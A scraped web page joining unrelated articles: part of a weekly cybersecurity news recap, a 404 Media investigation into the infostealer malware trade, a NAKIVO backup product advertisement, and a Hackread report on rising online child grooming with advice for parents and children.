*   **Operation Magnus Disrupts RedLine and MetaStealer:** A coordinated law enforcement operation led by the Dutch National Police led to the disruption of infrastructure associated with RedLine and MetaStealer malware. The effort led to the shut down of three servers in the Netherlands and the confiscation of two domains. In tandem, one unnamed individual has been arrested and a Russian named Maxim Rudometov has been charged for acting as one of RedLine Stealer's developers and administrators.
*   **Windows Downgrade Allows for Kernel-Level Code Execution:** New research has found that a tool that could be used to rollback an up-to-date Windows software to an older version could also be weaponized to revert a patch for a Driver Signature Enforcement (DSE) bypass and load unsigned kernel drivers, leading to arbitrary code execution at a privileged level. Microsoft said it's developing a security update to mitigate this threat.

****‎️‍🔥 Trending CVEs****

CVE-2024-50550, CVE-2024-7474, CVE-2024-7475, CVE-2024-5982, CVE-2024-10386, CVE-2023-6943, CVE-2023-2060, CVE-2024-45274, CVE-2024-45275, CVE-2024-51774

****📰 Around the Cyber World****

*   **Security Flaws in PTZ Cameras:** Threat actors are attempting to exploit two zero-day vulnerabilities in pan-tilt-zoom (PTZ) live streaming cameras used in industrial, healthcare, business conferences, government, religious places, and courtroom settings. Affected cameras use VHD PTZ camera firmware < 6.3.40, which is found in PTZOptics, Multicam Systems SAS, and SMTAV Corporation devices based on Hisilicon Hi3516A V600 SoC V60, V61, and V63. The vulnerabilities, tracked as CVE-2024-8956 and CVE-2024-8957, enable threat actors to crack passwords and execute arbitrary operating system commands, leading to device takeover. "An attacker could potentially seize full control of the camera, view and/or manipulate the video feeds, and gain unauthorized access to sensitive information," GreyNoise said. "Devices could also be potentially enlisted into a botnet and used for denial-of-service attacks." PTZOptics has issued firmware updates addressing these flaws.
*   **Multiple Vulnerabilities in OpenText NetIQ iManager:** Nearly a dozen flaws have been disclosed in OpenText NetIQ iManager, an enterprise directory management tool, some of which could be chained together by an attacker to achieve pre-authentication remote code execution, or allow an adversary with valid credentials to escalate their privileges within the platform and ultimately achieve post-authenticated code execution. The shortcomings were addressed in version 3.2.6.0300 released in April 2024.
*   **Phish 'n' Ships Uses Fake Shops to Steal Credit Card Info:** A "sprawling" fraud scheme dubbed Phish 'n' Ships has been found to drive traffic to a network of fake web shops by infecting legitimate websites with a malicious payload that's responsible for creating bogus product listings and serving these pages in search engine results. Users who click on these phony product links are redirected to a rogue website under the attacker's control, where they are asked to enter their credit card information to complete the purchase. The activity, ongoing since 2019, is said to have infected more than 1,000 websites and built 121 fake web stores in order to deceive consumers. "The threat actors used multiple well-known vulnerabilities to infect a wide variety of websites and stage fake product listings that rose to the top of search results," HUMAN said. "The checkout process then runs through a different web store, which integrates with one of four payment processors to complete the checkout. And though the consumer's money will move to the threat actor, the item will never arrive." Phish 'n' Ships has some elements in common with BogusBazaar, another criminal e-commerce network that came to light earlier this year.
*   **Funnull Behind Scam Campaigns and Gambling Sites:** Funnull, the Chinese company that acquired Polyfill\[.\]io JavaScript library earlier this year, has been linked to investment scams, fake trading apps, and suspect gambling networks. The malicious infrastructure cluster has been codenamed Triad Nexus. In July, the company was caught inserting malware into polyfill.js that redirected users to gambling websites. "Prior to the polyfill\[.\]io supply chain campaign, ACB Group – the parent company that owns Funnull's CDN – had a public webpage at 'acb\[.\]bet,' which is currently offline," Silent Push said. "ACB Group claims to own Funnull\[.\]io and several other sports and betting brands."
*   **Security Flaws Fixed in AC charging controllers:** Cybersecurity researchers have discovered multiple security shortcomings in the firmware of Phoenix Contact CHARX SEC-3100 AC charging controllers that could allow a remote unauthenticated attacker to reset the user-app account's password to the default value, upload arbitrary script files, escalate privileges, and execute arbitrary code in the context of root. The

**🔥 **Resources, Guides & Insights********🎥 Expert Webinar****

**Learn LUCR-3's Identity Exploitation Tactics and How to Stop Them —** Join our exclusive webinar with Ian Ahl to uncover LUCR-3's advanced identity-based attack tactics targeting cloud and SaaS environments.

Learn practical strategies to detect and prevent breaches, and protect your organization from these sophisticated threats. Don't miss out—register now and strengthen your defenses.

****🔧 Cybersecurity Tools****

*   **SAIF Risk Assessment** — Google introduces the SAIF Risk Assessment, an essential tool for cybersecurity professionals to enhance AI security practices. With tailored checklists for risks such as Data Poisoning and Prompt Injection, this tool translates complex frameworks into actionable insights and generates instant reports on vulnerabilities in your AI systems, helping you address issues like Model Source Tampering.
*   CVEMap — A new user-friendly tool for navigating the complex world of Common Vulnerabilities and Exposures (CVE). This command-line interface (CLI) tool simplifies the process of exploring various vulnerability databases, allowing you to easily access and manage information about security vulnerabilities.

****🔒 Tip of the Week****

**Essential Mobile Security Practices You Need** — To ensure robust mobile security, prioritize using open-source apps that have been vetted by cybersecurity experts to mitigate hidden threats. Utilize network monitoring tools such as **NetGuard** or **AFWall+** to create custom firewall rules that restrict which apps can access the internet, ensuring only trusted ones are connected. Audit app permissions with advanced permission manager tools that reveal both background and foreground access levels. Set up a DNS resolver like **NextDNS** or **Quad9** to block malicious sites and phishing attempts before they reach your device. For secure browsing, use privacy-centric browsers like **Firefox Focus** or **Brave**, which block trackers and ads by default. Monitor device activity logs with tools like **Syslog Viewer** to identify unauthorized processes or potential data exfiltration. Employ secure app sandboxes, such as **Island** or **Shelter**, to isolate apps that require risky permissions. Opt for apps that have undergone independent security audits and use VPNs configured with **WireGuard** for low-latency, encrypted network connections. Regularly update your firmware to patch vulnerabilities and consider using a mobile OS with security-hardening features, such as **GrapheneOS** or **LineageOS**, to limit your attack surface and guard against common exploits.

****Conclusion****

And that's a wrap on this week's cyber-adventures! Crazy, right? But here's a mind-blowing fact: Did you know that every 39 seconds, there's a new cyberattack somewhere in the world? Stay sharp out there! And if you want to become a true cyber-ninja, check out our website for the latest hacker news. See you next week! 👋

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

THN Recap: Top Cybersecurity Threats, Tools, and Practices (Oct 28 - Nov 03)

When you download a piece of pirated software, you might also be getting a piece of infostealer malware, and entering a highly complex hacking ecosystem that’s fueling some of the biggest breaches on the planet.

On October 20, a hacker who calls themselves Dark X said they logged in to a server and stole the personal data of 350 million Hot Topic customers. The following day, Dark X listed the data, including alleged emails, addresses, phone numbers, and partial credit card numbers, for sale on an underground forum. The day after that, Dark X said Hot Topic kicked them out.

Dark X told me that the apparent breach, which is possibly the largest hack of a consumer retailer ever, was partly due to luck. They just happened to get login credentials from a developer who had access to Hot Topic’s crown jewels. To prove it, Dark X sent me the developer’s login credentials for Snowflake, a data warehousing tool that hackers have repeatedly targeted recently. Alon Gal from cybersecurity firm Hudson Rock, which first found the link between infostealers and the Hot Topic breach, said he was sent the same set of credentials by the hacker.

The luck part is true. But the claimed Hot Topic hack is also the latest breach directly connected to a sprawling underground industry that has made hacking some of the most important companies in the world child’s play.

AT&T. Ticketmaster. Santander Bank. Neiman Marcus. Electronic Arts. These were not entirely isolated incidents. Instead, they were all hacked thanks to “infostealers,” a type of malware that is designed to pillage passwords and cookies stored in the victim’s browser. In turn, infostealers have given birth to a complex ecosystem that has been allowed to grow in the shadows and where criminals fulfill different roles. There are Russian malware coders continually updating their code; teams of professionals who use glitzy advertising to hire contractors to spread the malware across YouTube, TikTok, or GitHub; and English-speaking teenagers on the other side of the world who then use the harvested credentials to break into corporations. At the end of October, a collaboration of law enforcement agencies announced an operation against two of the world’s most prevalent stealers. But the market has been able to grow and mature so much that now law enforcement action against even one part of it is unlikely to make any lasting dent in the spread of infostealers.

Based on interviews with malware developers, hackers who use the stolen credentials, and a review of manuals that tell new recruits how to spread the malware, 404 Media has mapped out this industry. Its end result is that a download of an innocent-looking piece of software by a single person can lead to a data breach at a multibillion-dollar company, putting Google and other tech giants in an ever-escalating cat-and-mouse game with the malware developers to keep people and companies safe.

“We are professionals in our field and will continue to work on bypassing future Google updates,” an administrator for LummaC2, one of the most popular pieces of infostealer malware, told me in an online chat. “It takes some time, but we have all the resources and knowledge to continue the fight against Chrome.”

**The Stealers**

The infostealer ecosystem starts with the malware itself. Dozens of these exist, with names like Nexus, Aurora, META, and Raccoon. The most widespread infostealer at the moment is one called RedLine, according to cybersecurity firm Recorded Future. Having a prepackaged piece of malware also dramatically lowers the barrier to entry for a budding new hacker. The administrator of LummaC2, which Recorded Future says is in the top 10 of infostealers, said it welcomes both beginner and experienced hackers.

Initially, many of these developers were interested in stealing credentials or keys related to cryptocurrency wallets. Armed with those, hackers could empty a victim’s digital wallets and make a quick buck. Many today still market their tools as being able to steal bitcoin and have even introduced OCR to detect seed phrases in images. But recently those same developers and their associates figured out that all of the other stuff stored in a browser—passwords to the victim’s place of work, for example—could generate a secondary stream of revenue.

“Malware developers and their clients have realized that personal and corporate credentials, such as login details for online accounts, financial data, and other sensitive information, hold substantial value on the black market,” RussianPanda, an independent security researcher who follows infostealers closely, told 404 Media. Infostealer creators pivoted to capture this information too, she said. In essence, the exhaust from cryptocurrency-focused heists has created an entire new industry in its own right that is causing even more destruction across healthcare, tech, and other industries.

Some stealers then sell these collected credentials and cookies, or logs, themselves via bots on Telegram. Telegram, rather than acting as simply a messaging app, provides critical infrastructure for these teams. The entire process from buying to selling stolen logs is automated through Telegram bots. Telegram did not respond to a request for comment.

Infostealers are not especially hard to write, but the malware developers constantly butt heads with engineers inside tech giants, such as Google, who are trying to stop them from stealing users’ credentials.

In July, for example, Google Chrome rolled out an update that was designed to lock applications other than Chrome—including malware—from accessing cookie data. For a moment, Chrome had the upper hand. LummaC2 gave its users some workarounds, but none were a reliable fix. Some malware developers make their grievances known more explicitly. In one update, a pair of infostealers included the phrase “ChromeFuckNewCookies” in their malware’s code.

“It's a little bit of a cat and mouse, but we think that this is a game that we want to play as much as we can if the outcomes remain positive,” Will Harris, staff software engineer on Google Chrome, said. “We want to protect users, obviously, as much as we can.” That doesn’t just come in securing Chrome itself and protecting more data from infostealers. It also includes “disruption,” such as more researchers writing about infostealers’ particular techniques, which in turn constrains the tools available to the malware developers. Releasing updates one by one on a regular basis, rather than all at once, can also disrupt the malware developers. Instead of the criminal coders knowing what they need to fix all in one go, they can never be quite sure what Google is going to clamp down on next, wasting more of their time.

After one update, a lot of the customers of a stealer were “extremely upset, and they \[the malware makers\] had to work nights on coming up with a bypass,” Harris said. He added that one stealer, called Vidar, increased the cost of its tool too. “We have to stay agile here. I mean the infostealers are moving fast on this as well, and we want to be keeping up with them, and I think we are able to in this case,” he said.

He also pointed specifically to Microsoft Windows. “When you compare Windows with, say, Android, or with ChromeOS, or even macOS, those platforms have this strong application isolation.” Meaning, that malware has a harder time stealing data from other parts of the system. “We noticed on Windows, which was obviously a major platform for us, that these protections didn’t exist.”

In an email, a Microsoft spokesperson said, “In addition to the hardware-backed baseline requirements for all Windows PCs—such as, TPM, Secure Boot, and virtualization-based security, there are many security features now enabled by default in Win11 which makes it more difficult for info-stealers. Our guidance is that users should run as Standard User and not Admin on their Windows device. Running standard user means users (and apps being used by users) can make changes to their computer but do not have full system access by default, so that info stealers will not have the full access required to make it easy to steal the data that they are after.”

Infostealer malware for Mac does exist, but to a much smaller degree, according to Recorded Future.

A malware creator may have an effective piece of software in their hands. But ultimately getting that software onto victims’ computers is the job of someone else.

**The Traffers**

With electronic rap music playing in the background, a man stretches his hands forward and leans back into a chair. The camera pans around their alleged apartment: huge floor-to-ceiling windows in a large dining room, wood-paneled floors, and a funky chandelier. In another shot the man opens a laptop, types away, and then takes a sip of what looks like whiskey. The implication: This could be you if we work together.

This is one of a dizzying number of adverts on an underground forum called Lolz where “traffers” gather to look for new recruits. In this case, the man in the video is looking for people to push a fake casino tool that can steal people’s funds. But much of the rest of the “traffers” section is dedicated to proliferating infostealers. The job of these contractors is to help spread the malware or get them traffic, with teams vying for attention in a crowded marketplace. Each tries to one-up the other with outrageous advertising and branding. They use names such as “Billionaire Boys Club,” “Baphomet,” and “Chemodan.” Their adverts include animated GIFs of computer-generated luxury cars or private jets. Another for “Cryptoland Team” shows a knight in armor looking down at a skeleton in a hood writing on parchment paper. Cryptoland Team say they work with LummaC2 and another stealer called Rhadamanthys.

“Payment by logs or money. We give you a choice: Either you take the logs, or we buy them,” one advert from a team called Baphomet, with satanic branding, says.

Each lists the brand of infostealer they use, what split of the profits a collaborator can expect, and whether they allow an associate to take any extra exfiltrated logs. And most explicitly say that anyone they work with is prohibited from targeting the Commonwealth of Independent States (СНГ), or former members of the Soviet Union, which includes Belarus, Ukraine, and Russia. Collaborators then leave reviews and screenshots proving they’ve made money working with the team.

Many of these teams take new applications via their own Telegram bots. Some are strict in that they only want to work with people who are already experienced, while others seemingly take anyone on board. 404 Media was able to easily pass an application process for two traffer teams by answering some basic questions. After that, the bots sent links to the teams’ respective manuals, which lay out how to spread the malware.

One manual from Baphomet, for example, recommends bundling the stealer into cheating software for Roblox. It then describes how to set up a YouTube video advertising the cheat, and by extension, help propagate the malware.

Another advert from a traffer team says it works with TikTok, Telegram, Instagram, Twitter, Facebook, YouTube, YouTube Shorts, email newsletters, bloggers, and influencers. In the video of the hacker drinking whiskey, at one point his laptop shows a page on TikTok. Many of the manuals reflect this and recommend distributing infostealers via other social media sites or point to GitHub as an effective trafficking method.

Some infostealers are also hidden inside cracked or pirated software. One reason they’re so effective is that users are seeking the software out, not the other way around. People are actively searching for free software, be damned about the consequences.

A Google spokesperson said in an email, “We have policies in place to prevent spam, scams, or other deceptive practices that take advantage of the YouTube community. This includes prohibiting content where the main purpose is to trick others into leaving YouTube for another site.”

Meta did not respond to a request for comment. TikTok acknowledged a request but did not provide a response in time for publication.

And these traffers and others are clearly successful on a massive scale. Recorded Future says it sees 250,000 new infostealer infections every day.

**The Channels and Sites**

The harvested credentials are then fed into Telegram channels, where a tsunami of cookies and logins are available for purchase. The administrator for LummaC2 told me “This brings us good income, but I am not ready to disclose specific amounts,” referring to selling the stolen logs. Testing out the Telegram bot, it’s possible to filter by country, the number of cookies, or passwords available. 404 Media saw many U.S. logs available for sale. Over the past few weeks, some of these Telegram channels have been deleted. Telegram did not respond to a request for comment asking if it had taken action against them.

These, in turn, have their own branding, much like the traffers. Many channels also distribute stolen credentials for free, likely in an attempt to advertise their paid offerings. Even the freely available credentials can be devastating for a targeted organization. Earlier this year, a security researcher used exposed logins to compromise a server belonging to AU10TIX, an identity verification company that works with TikTok, Uber, and X. Those credentials came from a free stream available on Telegram, the researcher showed 404 Media at the time.

Some websites are also dedicated to, or have sections for, selling infostealer logs. Genesis Market is a site where the hackers responsible for the 2021 breach of Electronic Arts sourced a login token for the company’s Slack. In 2023, authorities shut down Genesis Market. But much of the credential selling has moved over to another long-running site, Russian Market, according to Recorded Future.

And this is where the hackers come in. Judische, the hacker linked to breaches at AT&T, Ticketmaster, and other companies that used Snowflake, likely lifted stolen credentials from these sorts of feeds and then used those to log into target servers. In some instances, those companies were not using multifactor authentication. But the power of logs is that they can sometimes bypass that extra layer of protection—a cookie can trick a service into thinking the user is trusted, and not prompt them for an extra login code.

Potentially with no idea how the logs were ultimately sourced, some English hackers ask in large group chats for passwords related to targets in particular countries. One I recently saw said they wanted logs for Canadian victims.

When interviewing Dark X, the alleged Hot Topic hacker, they seemed to sense another potential way to make some money. They mentioned they also sell logs.

“You wanna buy? haha,” they wrote.

Inside the Massive Crime Industry That’s Hacking Billion-Dollar Companies

Explore the features of the NAKIVO MSP backup solution. Choose the best MSP backup software to protect client…

Explore the features of the NAKIVO MSP backup solution. Choose the best MSP backup software to protect client data across multiple platforms efficiently. 

****The NAKIVO Backup Solution for MSPs: Data Protection for VMware, Microsoft 365, Proxmox and More** **

The growing demand for reliable data backup among individuals and organizations is simultaneously an opportunity and a challenge for managed service providers (MSPs). On one hand, finding the best MSP backup solution for multiple IT platforms can help expand the client base and increase revenue. On the other hand, the need to protect several environments can complicate management and impact the service quality.

MSPs need a comprehensive set of data protection functions with convenient management capabilities for multiple environments including VMware, Microsoft 365 and Proxmox. The NAKIVO backup solution for MSPs provides up-to-date functionality, extended compatibility, streamlined management, ultimate scalability, and flexible licensing.

****NAKIVO: The Best MSP Backup and Recovery Solution** **

The NAKIVO backup solution for MSP allows you to deliver robust data protection services, including backup-as-a-service (BaaS) and disaster-recovery-as-a-service (DraaS), for client infrastructures of any type, size and complexity. The features developed specifically for managed service providers enable seamless data protection and convenient management. Download the Free Trial and get 15 days to try the solution without feature or capacity limitations.

****MSP Backup and Recovery for VMware Environments****

NAKIVO backup solution for MSP enables you to provide efficient managed online backup services for VMware workloads. You can store backups of VMware VMs and data locally or send them offsite to Amazon S3, Wasabi, Azure Blob, Backblaze B2 or any other S3-compatible storage. NAS and tape destinations are also available.

The most noteworthy features are: 

*   Native integration with VMware’s Changed Block Tracking (CBT) for incremental backups.
*   Flash VM Boot – boot VMware virtual machines to original or custom hosts directly from backups for instant recovery.
*   Replication from backup – perform incremental replication from backups to offload production environments.
*   Real-Time ReplicationBETA – create exact copies of VMs and continuously update them to ensure near-instant RPOs.
*   Automated Failover – configure failover to replicas and launch presets once an incident occurs, achieving near-zero RTOs.
*   Physical-to-virtual recovery (P2V) – restore Windows and Linux machines as VMware vSphere VMs.
*   Cross-platform recovery – recover Hyper-V VMs as VMware workloads and vice versa. 

Use the NAKIVO Backup solution for MSPs to enable reliable backup and swift, flexible recovery of client VMware infrastructures, VMs and data items. 

****Microsoft 365 Data Protection: Backup as a Service for Office 365****

NAKIVO provides SaaS backup functionality to protect Microsoft 365 data. The solution enables: 

*   Backups of Microsoft 365 data, including Exchange Online, OneDrive for Business, SharePoint Online and Microsoft Teams.
*   Onsite Microsoft 365 backup storage for data availability and resilience to cyber threats.
*   Using Microsoft’s native change tracking technology for Exchange Online and Teams to accelerate backup workflows and optimize storage space usage.
*   Fast granular recovery – near-instant recovery of the required items without restoring an entire user account.
*   Retention flexibility – custom retention policies with recovery points rotated daily, weekly, monthly or yearly to store data for as long as you need

NAKIVO Backup solution for MSPs makes data protection in Microsoft 365 straightforward, ensuring SaaS data availability, business continuity and compliance for your clients.

****Proxmox Backup and Recovery: A New Frontier for MSPs****

With the latest update, NAKIVO’s backup as a service solution now supports agent-based backup and recovery for Proxmox VE. The available Proxmox data protection functionality includes the following: 

*   Fast, incremental and app-aware backups of Proxmox VMs.
*   Backup data tiering with multiple destinations including onsite, offsite, public cloud, NAS, deduplication appliances or tape storage.
*   Immutable storage, data encryption, role-based access control and two-factor authentication to protect Proxmox backup data from ransomware and unauthorized access.
*   Full VM recovery or granular recovery of individual files, folders and app objects to original or custom locations.

NAKIVO Backup for MSPs allows you to offer your clients several backups as a service benefit such as affordability and delegated administration combined with the free Proxmox hypervisor. This brings enhanced data availability and infrastructure resilience while maintaining the initial cost-efficiency of systems for clients.

****NAKIVO Backup Solution for MSPs: Versatility Across Environments****

With the NAKIVO solution, you can deliver managed backup as a service for physical, virtual, cloud, SaaS and hybrid environments, including:   

*   NAS
*   File shares
*   Proxmox VE
*   Nutanix AHV
*   Oracle RMAN
*   Microsoft Hyper-V
*   AWS EC2 instances
*   VMware vSphere and Cloud Director
*   Windows and Linux physical servers and workstations 

The wide range of supported environments allows you to easily and quickly cater to the unique needs of every client. With a single MSP backup solution to serve all clients, you can minimize management overhead, increase productivity and scale your business with ease. 

****Ransomware Protection and Advanced Security for MSPs****

Reliable solutions that offer backup and disaster recovery as a service should prioritize threat protection over prevention, enabling clients to restore data even in worst-case scenarios. The NAKIVO solution provides:

*   Immutable storage – enables immutability for local and cloud repositories to protect backup data from change or deletion by ransomware.
*   Malware scan – check your backups before recovery to ensure they don’t contain malware.
*   AES-256 encryption – enables encryption for backup data both during transfer and retention to prevent third-party access. 
*   Role-based access control (RBAC) – limit backup and recovery operations to specific users and ensure authorized access to data protection activities.
*   Direct Connect – connect to clients’ remote resources via a secure port channel without the need to establish and maintain a VPN.

With the NAKIVO backup solution for MSPs, you can ensure client data availability and recoverability when other cybersecurity measures fail. 

****Ease of Management and Automation for MSPs****

Streamlining management and workflow automation are key to efficient MSP backup and recovery. The solution from NAKIVO includes:

*   Multi-tenant mode – create isolated environments for up to 100 clients (tenants) with a single solution deployment.
*   Tenant resource allocation – flexibly allocate VMs, hosts, clusters, backup repositories and other resources in your infrastructure to tenants.
*   MSP Console – uses a unified and intuitive web interface to manage remote client environments from a single panel.
*   Self-service portal – allows clients to manage their own data protection activities.
*   Automation and scheduling – schedule custom backup and recovery workflows from the centralized panel to avoid overlaps and resource bottlenecks.
*   Policy-based data protection – set up policy rules to automatically back up or replicate machines that match the criteria you define.
*   Backup verification – receive verification reports or OS screenshots to verify that backups are recoverable. 
*   Site Recovery – create presets to automate and orchestrate complex disaster recovery sequences and restore entire environments in just a few clicks.
*   Non-disruptive DR testing – run disaster recovery tests by schedule or on demand without disrupting production networks.

Use the advanced management, automation and scheduling capabilities of the NAKIVO solution to adjust to every client’s needs. Ensure data security in the most dynamic and ramified environments.

****MSP Backup Pricing and Cost Efficiency****

NAKIVO offers convenient licensing for managed service providers. This means:

*   5 editions with different feature sets – pick the edition that suits your offering.
*   Perpetual or subscription-based license – choose the one that maximizes your profits.
*   Per-workload pricing – ensure there are no upfront fees or extra costs for unused capacity.
*   Monthly and annual subscription – pay monthly for added flexibility or annually for sizable discounts and additional savings.
*   24/7 vendor support – get in touch with NAKIVO experts whenever you need to guarantee service quality and meet SLAs. 
*   MSP Partner Program – receive certification, training and free marketing support from NAKIVO. 

You can leverage these benefits to increase your business efficiency and win more clients. Provide quality services at affordable costs to boost your revenue.

****Conclusion****

The NAKIVO solution enables efficient MSP backup and recovery for VMware, Microsoft 365, Proxmox VE and other platforms. Install the Free Trial to test the solution’s data protection management, recovery and cybersecurity capabilities in your environment. With NAKIVO, you can provide the best MSP backup solution, meet client needs, cut costs by up to 50%, increase productivity and grow your profit.  

1.  **How To Create a Complete GitHub Backup**
2.  **Recover Lost Data with Mac Data Recovery Software**
3.  **How to Recover Illustrator Files on Windows and Mac**
4.  **Microsoft Planner Backup – Restore: Guide to Data Protection**
5.  **Insights on Google Cloud Backup & Disaster Recovery Service**

NAKIVO Backup for MSP: Best Backup Solution for MSPs

Online grooming crimes against children have reached a record high, with Snapchat being the most popular platform for…

Online grooming crimes against children have reached a record high, with Snapchat being the most popular platform for offenders. Learn how to keep your child safe online and what to do if they’re being groomed or blackmailed.

Data from the United Kingdom’s National Society for the Prevention of Cruelty to Children (NSPCC) shows that online grooming crimes against children have increased by 89% over the past six years.

In 2023/24 alone, police recorded over 7,062 offences of Sexual Communication with a Child, with nearly half of these incidents occurring on **Snapchat** (48%). Other platforms frequently used by offenders include:

*   **WhatsApp (12%)**
*   **Facebook and Messenger (10%)**
*   **Instagram (6%)**
*   **Kik (5%)**

****Girls and Younger Children Most at Risk****

The figures, which were provided by 45 UK police forces, reveal a worrying rise in online grooming, known legally as “Sexual Communication with a Child,” cases, with girls making up 81% of the victims. What’s worse, primary school-aged children are also being targeted with the youngest victim recorded was just five years old.

It is worth noting that predators are using mainstream social media platforms, including Snapchat, WhatsApp, and Facebook, to target children, before encouraging them to continue communication on private and encrypted messaging platforms where abuse can proceed undetected.

Chart created by Hackread.com shows the use of social media in online grooming crimes

One victim, Thomas, who was groomed online at the age of 14, shared his experience: “At first, it felt like I was chatting with the most supportive person ever. But after a month, the pressure started. He sent explicit pictures and demanded I send some back. I didn’t want to, but I felt trapped because he threatened to share the images with everyone if I didn’t continue.” Thankfully, Thomas found the courage to block the predator, but the fear and anxiety he experienced stayed with him long afterwards,” revealed NSPCC’s **report**.

The NSPCC is urging Ofcom to strengthen its approach to child sexual abuse and for the UK government to ensure the regulator can tackle grooming in private messaging. The charity is calling for social media platforms to be proactive in preventing abuse, rather than just reacting after harm has taken place.

The charity is also pushing the UK government to strengthen laws around private messaging platforms like Snapchat and WhatsApp, where much of the abuse occurs. Although the new Online Safety Act will impose duties on social media companies to protect children, many of these regulations won’t take effect until 2025 or later.

**Mark Jones**, a partner at law firm Payne Hicks Beach, commented, “Snapchat’s disappearing messages feature makes it incredibly difficult to take action against abusers. While the platform claims it can recover some user data, the images themselves are often lost. With the Online Safety Act still not fully in force, Snapchat and similar platforms need to reassess how they are addressing the risks to children and find ways to better protect them.”

****What Can Parents Do?****

As online grooming and cybercrime against children are increasing, **parents need to stay aler**t about their children’s online activities. Here are five steps parents can take to keep their kids safe:

1.  **Talk Regularly About Online Safety**: Have open conversations with your children about the dangers of talking to strangers online and encourage them to come to you if they ever feel uncomfortable.
2.  **Set Up Parental Controls**: Use parental control settings on devices, apps, and games to monitor what your child is doing online and limit access to risky platforms.
3.  **Monitor Social Media Usage**: Keep an eye on which apps your child is using, and regularly check privacy settings to ensure their personal information is protected.
4.  **Encourage Safe Online Habits**: Teach your children never to share personal information or photos with people they don’t know and to be cautious when accepting friend requests.
5.  **Create a Safe Space for Communication**: Let your child know they can talk to you without fear of punishment if something goes wrong online. Encourage them to report any inappropriate behaviour or messages.

****What to Do If You’re Being Blackmailed by a Groomer or Predator****

If a child finds themselves being blackmailed or groomed by an online predator, here’s what they should do:

1.  **Tell a Trusted Adult Immediately**: Whether it’s a parent, teacher, or another trusted person, the most important step is to seek help right away.
2.  **BLOCK THEM – Stop All Communication**: Block the person on all platforms and do not respond to any further messages.
3.  **Do Not Share Any More Information or Images**: Even if the predator threatens to expose private information, it’s crucial not to give in to their demands.
4.  **Report the Situation**: Contact the platform where the abuse is happening and report the user. You can also report the incident to the police or a child protection organisation like the NSPCC.
5.  **Seek Professional Support**: Talking to a professional, such as a counsellor or therapist, can help children work through the emotional impact of the situation.

Nevertheless, by staying informed and maintaining open communication, parents can help protect their children from the growing threat of online grooming. And with stronger laws and platform regulations, we can all work toward a safer digital world for our kids.

1.  **Student uses Snapchat’s gender filter to bust pervert cop**
2.  **Man sought dark web hitman to murder child abuse victim**
3.  **Op protected childhood: 113 online child predators arrested**
4.  **How Facebook Helped FBI Capture a Notorious Child Abuser**
5.  **9 risky apps that you must monitor on your kids’ smartphone**
6.  **Microsoft’s tool detects, reports pedophiles from online chats**

Tag

#microsoft